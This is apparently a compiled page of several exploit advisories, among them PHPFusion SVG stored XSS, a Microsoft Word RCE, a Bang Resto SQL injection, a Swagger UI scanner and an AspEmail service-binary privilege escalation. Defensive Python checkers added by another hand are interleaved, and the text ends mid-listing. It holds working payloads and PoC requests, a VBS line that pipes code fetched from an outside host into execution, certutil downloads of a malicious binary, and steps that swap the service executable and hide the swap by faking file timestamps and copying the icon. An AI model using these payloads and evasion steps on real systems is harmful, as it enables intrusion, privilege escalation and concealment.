Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Application: PHPFusion
Version: 9.10.30
Bugs: XSS
Technology: PHP
Vendor URL: https://www.php-fusion.co.uk/home.php
Software Link: https://sourceforge.net/projects/php-fusion/
Date found: 28-04-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Steps:
1. Go to the Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw).
2. Upload a malicious SVG file.
SVG file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
PoC request:
POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
Host: localhost
Content-Length: 1198
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
Connection: close
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="reqid"
187c77be8e52cf
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="cmd"
upload
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="target"
l1_Lw
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"
SVG_XSS.svg
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="mtime[]"
1681116842
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="overwrite"
0
------WebKitFormBoundaryxF2jB690PpLWInAA--
3. Then go to Images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or open the SVG file directly (http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg).
PoC video: https://youtu.be/6yBLnRH8pOY
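As an added example (not PHPFusion or elFinder code; the function and constant names are mine), a server-side check an upload handler can run before accepting an SVG. It flags the `<script>` element from the file above and, going beyond the page's one case, also event-handler attributes, external references and script-capable elements such as `foreignObject`.

```python
"""Pre-upload check for SVG files that can run script when served inline.

Added example for the PHPFusion file-manager issue above; it is not code
from PHPFusion, elFinder or the advisory author, and all names are my own.
"""
from typing import List
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Elements that execute script or embed foreign content; <set>/<animate> can
# rewrite href attributes to javascript: URLs after load, so they are refused too.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "set", "animate"}
# Reference attributes (xlink:href and plain href) must only point inside the file.
REFERENCE_ATTRS = {"href"}


def _local(qualified: str) -> str:
    """Drop the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> List[str]:
    """Return the reasons an uploaded SVG must be rejected; [] means it passed."""
    findings: List[str] = []
    try:
        # expat does not fetch the external DTD named in the DOCTYPE, so the
        # parse itself makes no network request.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for elem in root.iter():
        name = _local(elem.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{name}>")
        if name == "style" and elem.text and ("url(" in elem.text or "@import" in elem.text):
            findings.append("<style> loads external resources")
        for attr, value in elem.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                findings.append(f"event handler {aname} on <{name}>")
            elif aname in REFERENCE_ATTRS and not value.strip().startswith("#"):
                findings.append(f"external reference {aname}={value!r} on <{name}>")
    return findings


def svg_is_safe(data: bytes) -> bool:
    """Convenience wrapper for an upload handler: accept only when nothing was flagged."""
    return not svg_findings(data)


# The SVG from the advisory (constructed test input) and a harmless version of it.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", svg_findings(doc) or "ok")
```

Rejecting at upload time complements serving user files with `Content-Disposition: attachment` and a restrictive Content-Security-Policy, which prevents inline rendering even when a check is bypassed.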
# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
# Date: 2023-04-28
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.9.2
# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913
# CVE: CVE-2023-25438
MilleGPG / MilleGPG5 also known as "Governo Clinico 3"
Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.
Affected/tested version: MilleGPG5 5.9.2
Summary:
Mille General Practice Governance (MilleGPG) is an interactive tool for improving the quality of care delivered through the Italian general practice network.
MilleGPG is an IT support tool for evaluating and optimising patient care and intervention processes, including features for managing the COVID-19 vaccine campaign. It also offers the general practitioner contextual access to authoritative scientific content and CME training.
Vuln desc:
The application has insecure file and folder permissions on its default installation path, which wrongly allow some files to be modified by unprivileged users, malicious processes and/or threat actors. An attacker can exploit this weakness by abusing the "write" permission on the main application, which is granted to all users on the system or network.
Details:
Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:
C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application)
C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)
C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)
such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA
## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311
## Description:
The attack is carried out locally by an authenticated user on the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website, leading to a local attack on the victim's computer. By using a malicious `Word` file to make the victim open a malicious web page, the attacker can steal credentials and bank account information, or sniff and track all of the victim's traffic without interruption; it depends on the scenario.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment the victim hits the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spent:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
# Date: 2023-04-23
# CVE: CVE-2023-2417
# Exploit Author: MrEmpy
# Vendor Homepage: https://www.ks-soft.net
# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
# Version: > 12.56
# Tested on: Windows 10 21H2
Title:
================
Advanced Host Monitor > 12.56 - Unquoted Service Path
Summary:
================
An unquoted service path vulnerability has been discovered in Advanced Host Monitor version > 12.56 affecting the executable "C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe". This vulnerability occurs when the service's path is misconfigured, allowing an attacker to run a malicious file instead of the legitimate executable associated with the service.
An attacker with local user privileges could exploit this vulnerability to replace the legitimate RMA-Win\rma_active.exe service executable with a malicious file of the same name located in a directory that has a higher priority than the legitimate directory. That way, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system, or stop the service from functioning.
To exploit this vulnerability, an attacker would need local access to the system and the ability to write and replace files on the system. The vulnerability can be mitigated by correcting the service path so that the full path of the executable is enclosed in quotation marks. Furthermore, it is recommended that users keep software updated with the latest security updates and limit physical and network access to their systems to prevent malicious attacks.
Proof of Concept:
================
C:\>sc qc ActiveRMAService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveRMAService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KS Active Remote Monitoring Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
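As an added example (not KS-Soft code or the advisory author's), a small audit helper that parses the text `sc qc` prints, decides whether the image path is unquoted and contains a space, and produces the quoted `BINARY_PATH_NAME` the advisory recommends as the fix. The sample output is constructed from the PoC above.

```python
"""Flag Windows services whose unquoted image path contains spaces.

Added example for the Advanced Host Monitor finding above; it is not code
from KS-Soft or the advisory author. It parses the text that `sc qc` prints
(the output format shown in the PoC) and builds the quoted path the advisory
recommends as the fix. All names are my own.
"""
import re
from typing import Dict, Optional, Tuple

# "        KEY   : value" lines as printed by sc qc
_KV = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")
# Heuristic: everything up to the first ".exe" is the image, the rest are arguments
_IMAGE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn `sc qc <name>` output into a dict keyed by field name."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = _KV.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def split_image_path(binary_path: str) -> Tuple[str, str]:
    """Return (executable, arguments) for a BINARY_PATH_NAME value."""
    value = binary_path.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        if end == -1:
            return value[1:], ""
        return value[1:end], value[end + 1:].strip()
    m = _IMAGE.match(value)
    if m:
        return m.group(1), (m.group(2) or "").strip()
    return value, ""


def is_unquoted_service_path(binary_path: str) -> bool:
    """True when the path is unquoted and a space makes it ambiguous to the SCM."""
    if binary_path.strip().startswith('"'):
        return False
    exe, _ = split_image_path(binary_path)
    return " " in exe


def quote_service_path(binary_path: str) -> str:
    """Build the corrected BINARY_PATH_NAME value: executable quoted, arguments kept."""
    exe, args = split_image_path(binary_path)
    return f'"{exe}" {args}'.rstrip()


def audit_service(sc_qc_output: str) -> Optional[str]:
    """Return the quoted replacement path if the service is misconfigured, else None."""
    fields = parse_sc_qc(sc_qc_output)
    path = fields.get("BINARY_PATH_NAME", "")
    if is_unquoted_service_path(path):
        return quote_service_path(path)
    return None


# Constructed from the sc qc output in the advisory (path kept on one line).
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveRMAService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KS Active Remote Monitoring Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    fix = audit_service(SAMPLE_SC_QC)
    print("misconfigured, set BINARY_PATH_NAME to:" if fix else "ok", fix or "")
```

The returned value is what an administrator would pass to `sc config <name> binPath= "..."`; the same check can be run over the output of `sc qc` for every service on a host.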
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys

if __name__ == "__main__":
    target = sys.argv[1]

    # Enable the Chrome performance log so the browser's network requests can be read back
    desired_capabilities = DesiredCapabilities.CHROME
    desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}

    options = webdriver.ChromeOptions()
    options.add_argument("--headless")
    options.add_argument("--ignore-certificate-errors")
    options.add_argument("--log-level=3")
    options.add_experimental_option("excludeSwitches", ["enable-logging"])

    # Browser webdriver path
    drive_service = Service("C:/chromedriver.exe")
    driver = webdriver.Chrome(service=drive_service,
                              options=options,
                              desired_capabilities=desired_capabilities)

    # Load the page once with each parameter that may point Swagger UI at an external spec
    driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
    time.sleep(10)
    driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
    time.sleep(10)

    # Keep only the network events from the performance log
    logs = driver.get_log("performance")
    with open("log_file.json", "w", encoding="utf-8") as f:
        f.write("[")
        for log in logs:
            log_file = json.loads(log["message"])["message"]
            if("Network.response" in log_file["method"]
               or "Network.request" in log_file["method"]
               or "Network.webSocket" in log_file["method"]):
                f.write(json.dumps(log_file)+",")
        f.write("{}]")
    driver.quit()

    json_file_path = "log_file.json"
    with open(json_file_path, "r", encoding="utf-8") as f:
        logs = json.loads(f.read())

    # If the browser requested the injected URL, the page honoured the parameter
    for log in logs:
        try:
            url = log["params"]["request"]["url"]
            if(url == "https://petstore.swagger.io/v2/hacked1.json"):
                print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
            if(url == "https://petstore.swagger.io/v2/hacked2.json"):
                print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
        except Exception:
            pass  # entries without a request URL (responses, websocket frames)
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849
*Affected Parameters:*
btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],
itemqty[], btnMenuItemID
*Steps to Reproduce:*
1. First, log in to the staff panel.
2. Then go to the "order" menu, select a menu item, create an order and intercept
the request with Burp Suite.
The request data will be:
POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close
btnMenuItemID=1&qty=1
3. The "btnMenuItemID" parameter is vulnerable. Let's try a union-based
SQL injection with this query in the "btnMenuItemID" parameter: ".1 union select
1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
-"
4. Check the browser; you will see the user, database and version information.
5. You could also use sqlmap to dump the whole database by saving the web request from Burp Suite.
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we test whether the AspEmail service is active.
* With normal user rights, we list the processes running on the system and check whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have confirmed that the process of the "Persits Software EmailAgent" service is in the "RUNNING" state.
* Now we know that the AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* Our checks detected a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service.
# ================================================================================================================== #
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike the other directories, we have full privileges in the service's "BIN" directory.
* In Linux terms, this is chmod 0777 (rwxrwxrwx).
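As an added example (not vendor code or the advisory author's; names are mine), a parser for `icacls` output that flags ACEs granting write-capable rights to broad principals. It covers both the `Everyone:(OI)(CI)(F)` entry on the BIN directory above and the `BUILTIN\Users:(I)(OI)(CI)(R,W)` entry the MilleGPG advisory earlier on this page describes; both listings below are constructed from those advisories.

```python
"""Find ACEs in icacls output that let broad groups write to an install directory.

Added example for the AspEmail BIN directory listing above and the MilleGPG
permissions in the earlier advisory; it is not code from either vendor or from
the advisory authors, and the helper names are my own.
"""
import re
from typing import List, Set, Tuple

# Inheritance/propagation markers in an icacls ACE; everything else is a right.
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple and specific icacls rights that allow changing files or the directory.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WEA", "WA", "DC", "WDAC", "WO"}
# Principals that mean "any local user" (compared case-insensitively).
BROAD_PRINCIPALS = {"everyone", r"builtin\users", r"nt authority\authenticated users", "users"}

_ACE_LINE = re.compile(r"^(?P<principal>.+):(?P<aces>(?:\([^()]*\))+)$")


def parse_icacls(output: str, path: str) -> List[Tuple[str, Set[str], bool]]:
    """Return (principal, rights, is_deny) for each ACE line of `icacls <path>` output.

    The first line carries the path before the first principal, so the caller
    passes the path used in the command and it is stripped here.
    """
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = _ACE_LINE.match(line)
        if not m:
            continue  # summary lines such as "Successfully processed ..."
        groups = re.findall(r"\(([^()]*)\)", m.group("aces"))
        is_deny = "DENY" in groups
        rights: Set[str] = set()
        for g in groups:
            if g in INHERITANCE_FLAGS or g == "DENY":
                continue
            rights.update(tok.strip() for tok in g.split(","))
        entries.append((m.group("principal").strip(), rights, is_deny))
    return entries


def risky_aces(output: str, path: str) -> List[Tuple[str, List[str]]]:
    """ACEs that grant write-capable rights to Everyone/Users on the given path."""
    findings = []
    for principal, rights, is_deny in parse_icacls(output, path):
        if is_deny or "N" in rights:  # deny entries and "no access" never widen rights
            continue
        if principal.lower() in BROAD_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append((principal, sorted(rights)))
    return findings


# Constructed from the icacls listing in the AspEmail advisory.
ASPEMAIL_BIN = r"C:\Program Files (x86)\Persits Software\AspEmail\BIN"
ASPEMAIL_ICACLS = r"""C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                    DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                    BUILTIN\Administrators:(I)(F)
                                                    CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                    BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed to match the BUILTIN\Users:(I)(OI)(CI)(R,W) entry the MilleGPG advisory describes.
MILLEGPG_DIR = r"C:\Program Files\MilleGPG5"
MILLEGPG_ICACLS = r"""C:\Program Files\MilleGPG5 BUILTIN\Users:(I)(OI)(CI)(R,W)
                           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                           BUILTIN\Administrators:(I)(OI)(CI)(F)
"""

if __name__ == "__main__":
    for d, out in ((ASPEMAIL_BIN, ASPEMAIL_ICACLS), (MILLEGPG_DIR, MILLEGPG_ICACLS)):
        print(d, "->", risky_aces(out, d) or "no broad write access")
```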
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* This shows that "EmailAgent.exe" was installed by the Administrator and is owned by BUILTIN\Administrators.
# ==================================================================================================================
* Now we take ownership of this directory, since we will carry out our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* OK. All commands completed successfully. We now have full privileges on this directory.
# ==================================================================================================================
* Now we modify the EmailAgent file and inject self-written malware.
* We are careful not to damage any files while doing this, so that all changes can easily be undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We now set the Last Modified, Creation and Last Accessed dates.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* Next, we extract the icon of the real EmailAgent.exe and apply it to the exploit. This makes it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can also be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
